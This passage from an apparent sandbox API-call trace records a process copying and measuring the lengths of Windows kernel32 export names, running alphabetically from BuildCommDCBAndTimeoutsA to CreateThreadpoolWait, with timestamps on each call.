lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.176] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.176] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.176] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.176] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.176] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.176] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.176] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.176] lstrlenA (lpString="CANCELIO") returned 8 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.176] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.177] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.177] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.177] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.177] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.177] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.177] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.177] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.177] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.177] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.177] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.177] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.177] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.177] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.177] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.177] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.177] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.177] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.177] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.178] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.178] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.178] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.178] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.178] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.178] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.178] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.178] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.178] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.178] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.178] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.178] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.178] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.178] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.178] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.178] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.178] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.179] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.179] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.179] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.179] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.179] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.179] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.179] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.179] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.179] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.179] lstrlenA (lpString="COPYFILEA") returned 9 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.179] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.179] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.179] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.179] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.179] lstrlenA (lpString="COPYFILEW") returned 9 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.179] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.179] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.179] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.180] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.180] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.180] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.180] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.180] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.180] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.180] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.180] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.180] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.180] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.180] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.180] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.180] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.180] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.180] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.180] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.180] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.180] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.181] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.181] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.181] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.181] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.181] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.181] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.181] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.181] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.181] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.181] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.181] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.181] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.181] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.181] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.181] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.181] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.181] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.182] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.182] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.182] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.182] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.182] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.182] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.182] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.182] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.182] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.182] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.182] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.182] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.182] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.182] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.182] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.182] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.182] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.182] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.183] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.183] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.183] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.183] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.183] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.183] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.183] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.183] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.183] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.183] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.183] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.183] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") 